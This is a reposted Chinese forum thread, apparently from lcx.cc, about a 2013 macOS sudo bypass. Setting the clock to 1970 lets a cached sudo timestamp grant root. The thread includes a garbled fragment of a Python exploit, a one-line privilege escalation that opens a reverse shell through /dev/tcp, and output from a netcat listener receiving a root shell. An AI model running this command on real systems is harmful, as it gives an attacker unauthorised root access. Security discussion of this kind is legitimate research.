OSX 2013-09-04 老系统内容 Root

2021年4月3日19:18:19评论35 views字数 2744阅读9分8秒阅读模式

#!/usr/bin/python # Original MSF Module: # https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb ################################################################################################### # Exploit Title: OSX & /dev/tcp/%s/%s 0>&1 &n" % (ipaddr,port)) print """ ############################################################### # # OSX

[原文地址]

相关讨论：

xsjswt | 2013-09-03 13:31

@xsser 为什么不发exploit那个领域

xsjswt | 2013-09-03 13:32

systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo sunbash -i >& /dev/tcp/%s/%s 0>&1 &

xsjswt | 2013-09-03 13:33

就这句就够了吧

xsjswt | 2013-09-03 13:33

还有个2>&1，不然很多错误信息看不到

xsser (十根阳具有长短!!) | 2013-09-03 13:38

ls -al /usr/sbin/systemsetup
-rwxr-xr-x  1 root  wheel  249360  7  8  2011 /usr/sbin/systemsetup

这个没有什么特别啊为什么能够root呢

123 (v2ex) | 2013-09-03 13:54

systemsetup是系统配置工具，但是这个需要admin权限才能运行，只是说绕过root密码执行操作

xsser (十根阳具有长短!!) | 2013-09-03 14:04

@123 你没有回答问题啊 /usr/sbin/systemsetup 这个怎么会有root权限

8#感谢(1)

疯狗 (谁淫荡啊谁淫荡) | 2013-09-03 14:17

@xsjswt @123 @xsser

FengGou:Desktop $ ./root.py 
[*] Exploit has been performed. You should have a shell on ipaddr: 192.168.1.113 and port 8888

FengGou:~ $ nc -vvl 8888
bash: no job control in this shell
bash-3.2#

FengGou:Desktop $ sudo -k
FengGou:Desktop $ ./root.py 
[*] Exploit has been performed. You should have a shell on ipaddr: 192.168.1.113 and port 8888
FengGou:Desktop $ Password:
Password:
Password:

FengGou:~ $ nc -vvl 8888
bash: no job control in this shell
bash-3.2$

如果没猜错的话，这个exp是有个前提的，就是你最近sudo过，生成过用户认证时间戳文件，而且还在有效期内。

不关systemsetup的事，是sudo bin的漏洞。

PS:注意sudo -k

疯狗 (谁淫荡啊谁淫荡) | 2013-09-03 14:22

k参数的man如下：

-k    When used by itself, the -k (kill) option to sudo invalidates the
      user's time stamp by setting the time on it to the Epoch.  The next
      time sudo is run a password will be required.  This option does not
      require a password and was added to allow a user to revoke sudo
      permissions from a .logout file.

      When used in conjunction with a command or an option that may require a
      password, the -k option will cause sudo to ignore the user's time stamp
      file.  As a result, sudo will prompt for a password (if one is required
      by sudoers) and will not update the user's time stamp file

更新时间错文件后，systemsetup将系统时间改成0，就是1970年第一天，触发这个sudo漏洞，我在看看CVE哈

10#

低调 | 2013-09-03 14:28

[b]厉害

11#

落叶纷飞 (im luoye,Once the 00day) | 2013-09-03 14:58

蛋疼。。。

12#

疯狗 (谁淫荡啊谁淫荡) | 2013-09-03 15:06

好了，找到官方公告了，一切尽在不言中

http://www.sudo.ws/sudo/alerts/epoch_ticket.html

13#

我勒个去 | 2013-09-03 15:13

@xsser 这是两个命令，BUG出在系统被设置为1970年这个时间，会导致sudo不要密码。

14#

xsjswt | 2013-09-03 16:20

@xsser @我勒个去 @疯狗屌

15#

雨路 (迷你主机网- 免费PH空间www.mi-ni.ml) | 2013-09-03 16:25

上回日国外站的时候就遇到一台mac os的服务器

16#

Lenwood (r) | 2013-09-03 17:14

@疯狗 @xsser 既然在有效期内，明明直接sudo su - 就root了，爱咋咋地。再用systemsetup不是多此一举。

17#

xsser (十根阳具有长短!!) | 2013-09-03 18:20

@Lenwood 用system破坏这个有效期的机制

文章来源于lcx.cc:OSX

2013-09-04

老系统内容
Root

约 1111 字
预计阅读 3 分钟

相关推荐: 金融改革记录片(97% Owned)－97%被私人银行占据的无中生有债务货币

金融改革紀錄片97%owned中文字幕「97% Owned展现出对於我们经济和金融体系严肃研究且可证实的证据。这是首部从英国观点对於此议题的记录片，并解释了中央银行以及金钱创造过程的内在运作。当金钱驱动著几乎所有这颗星球上的所有活动时，重要的是我们要了解金…

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

OSX 2013-09-04 老系统内容 Root

Php安全新闻早8点（2011-11-17 星期四） - 技术文章

黑客组织与墨西哥毒贩对峙取胜被绑成员已获释

PageAdmin cms getshell 0day - 脚本漏洞

UFO造访水星视频遭网友曝光美天文学家否认

WordPress 注入检查脚本 - 脚本漏洞

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

深山网站管理系统漏洞 - 脚本漏洞

【Php】ABCMS新闻发布系统漏洞 - 脚本漏洞

德清洁工误将艺术品当灰尘擦干净致损失80万欧元

德新型单人飞行器试飞成功

发表评论

在线咨询

微信